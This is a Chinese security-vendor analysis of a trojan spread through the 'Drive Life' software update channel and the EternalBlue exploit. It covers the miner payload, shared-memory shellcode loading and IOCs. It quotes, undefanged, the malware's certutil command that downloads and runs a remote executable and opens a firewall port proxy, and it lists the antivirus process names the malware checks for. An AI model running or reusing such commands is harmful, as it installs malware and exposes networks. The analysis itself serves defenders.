“驱动人生”升级通道传木马,技术分析报告来了

一、概述

12月14日下午,腾讯安全御见威胁情报中心监测发现,一款通过“驱动人生”升级通道,并同时利用“永恒之蓝”高危漏洞传播的木马突然爆发,仅2个小时受攻击用户就高达10万。

“驱动人生”木马会利用高危漏洞在企业内网呈蠕虫式传播,并进一步下载云控木马,对企业信息安全威胁巨大,企业用户须重点关注。

该病毒爆发刚好是周末时间,令企业网管猝不及防,周一工作日员工电脑开机后,建议立刻查杀病毒,再使用杀毒软件的漏洞修复功能安装系统补丁。个人电脑用户使用腾讯电脑管家即可防御。

“驱动人生”升级通道传木马,技术分析报告来了_第1张图片

木马攻击流程图

二、详细分析

dtlupg.exe访问以下url下载病毒

hxxp://xxxx.update.ackng.com/ziptool/pullexecute/f79cb9d2893b254cc75dfb7f3e454a69.exe

hxxp://xxxx.update.ackng.com/calendar/pullexecute/f79cb9d2893b254cc75dfb7f3e454a69.exe

(注意,为避免网友点击以上链接直接下载病毒程序,已对部分字符做了隐藏处理)

病毒文件释放在:

“C:Program Files (x86)DTLSoft iliUpdaterctrlf79cb9d2893b254cc75dfb7f3e454a69.exe”等位置执行。

f79cb9d2893b254cc75dfb7f3e454a69.exe 运行后最终释放出 C:WINDOWSTempsvvhost.exe

(MD5:2E9710A4B9CBA3CD11E977AF87570E3B)运行,svvhost.exe打包了“永恒之蓝”等漏洞攻击工具在内外网进一步扩散。

2.1 病毒母体

F79CB9D2893B254CC75DFB7F3E454A69.exe

运行后将自身拷贝到C:windowssystem32svhost.exe,安装为服务并启动,服务名为Ddiver,并在随后拉起云控模块svhhost.exe、攻击模块svvhost.exe。

运行时先检测互斥体,确定是否已感染过。

“驱动人生”升级通道传木马,技术分析报告来了_第2张图片

通过检测以下进程将杀软信息搜集准备上传。

360tray.exe|360sd.exe|avp.exe|KvMonXP.exe|RavMonD.exe|Mcshield.exe|egui.exe|kxetray.exe|knsdtray.exe|TMBMSRV.exe|avcenter.exe|ashDisp.exe|rtvscan.exe|ksafe.exe|QQPCRTP.exe


“驱动人生”升级通道传木马,技术分析报告来了_第3张图片

检测到任务管理器及游戏进程则将云控模块svhhost.exe退出。

“驱动人生”升级通道传木马,技术分析报告来了_第4张图片

打开互斥体,对象名称为"I am tHe xmr reporter" ,xmr意指xmrig.exe矿机。


“驱动人生”升级通道传木马,技术分析报告来了_第5张图片

搜集系统敏感信息上传到hxxp://i.haqo.net/i.png,并接受返回的云控代码等待执行。

“驱动人生”升级通道传木马,技术分析报告来了_第6张图片

母体设置进程共享内存HSKALWOEDJSLALQEOD

“驱动人生”升级通道传木马,技术分析报告来了_第7张图片

2.2 挖矿

云控木马svhhost.exe其主要功能是,从母体进程svhost.exe共享内存中读取shellcode解密并执行,每隔2000秒读取一次共享内存中的shellcode进行解密执行,共享内存名为HSKALWOEDJSLALQEOD,目前该shellcode主要功能挖矿,不排除后期会拉取其他更加恶意如加密勒索等木马病毒执行

“驱动人生”升级通道传木马,技术分析报告来了_第8张图片

云控木马执行流程

云控木马运行后会创建一个线程,该线程函数主要功能是判断进程svhost.exe(母体进程)是否存在,不存在的话则启动该进程,接下来要读取的共享内存数据就是从该进程进行读取

调用OpenFileMappingA打开共享内存,读取共享内存数据

读取共享内存数据

调用RtlDecompressBuffer函数解压共享内存中的数据,为下一步执行做准备


“驱动人生”升级通道传木马,技术分析报告来了_第9张图片


解压共享内存数据

共享内存数据加压完后会执行,目前该shellcode主要功能挖矿,不排除后期会拉取其他更加恶意如加密勒索等木马病毒执行


“驱动人生”升级通道传木马,技术分析报告来了_第10张图片

执行shellcode

“驱动人生”升级通道传木马,技术分析报告来了_第11张图片

尝试挖矿时通信IP为172.105.204.237

“驱动人生”升级通道传木马,技术分析报告来了_第12张图片

2.3 攻击模块

攻击模块从地址hxxp://dl.haqo.net/eb.exez下载,作为子进程Svvhost.Exe启动,分析发现该文件是通过python实现的“永恒之蓝”漏洞利用模块压缩打包程序。

子进程Svvhost.Exe为将python实现的“永恒之蓝”漏洞利用模块压缩打包程序。


“驱动人生”升级通道传木马,技术分析报告来了_第13张图片

Mysmb.pyo为攻击时扫描代码。


“驱动人生”升级通道传木马,技术分析报告来了_第14张图片

GitHub上也可以看到相关开源代码

“驱动人生”升级通道传木马,技术分析报告来了_第15张图片


“驱动人生”升级通道传木马,技术分析报告来了_第16张图片

不仅攻击内网漏洞机器,还随机找几个外网IP尝试攻击,1次攻击完后沉默20分钟

“驱动人生”升级通道传木马,技术分析报告来了_第17张图片



攻击成功后paylaod在中招机器执行以下命令进行内网扩散传播

cmd.exe /c certutil -urlcache -split -f http://dl.haqo.net/dl.exe c:/install.exe&c:/install.exe&netsh firewall add portopening tcp 65531 DNS&netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53

IOCs

域名

i.haqo.net

dl.haqo.net

md5

2e9710a4b9cba3cd11e977af87570e3b

74e2a43b2b7c6e258b3a3fc2516c1235

f79cb9d2893b254cc75dfb7f3e454a69

URL

hxxp://dl.haqo.net/eb.exez

hxxp://i.haqo.net/i.png?ID= xxxxx

本文转自高效运维社区,如需转载请标明。

你可能感兴趣的:(运维,python,网络)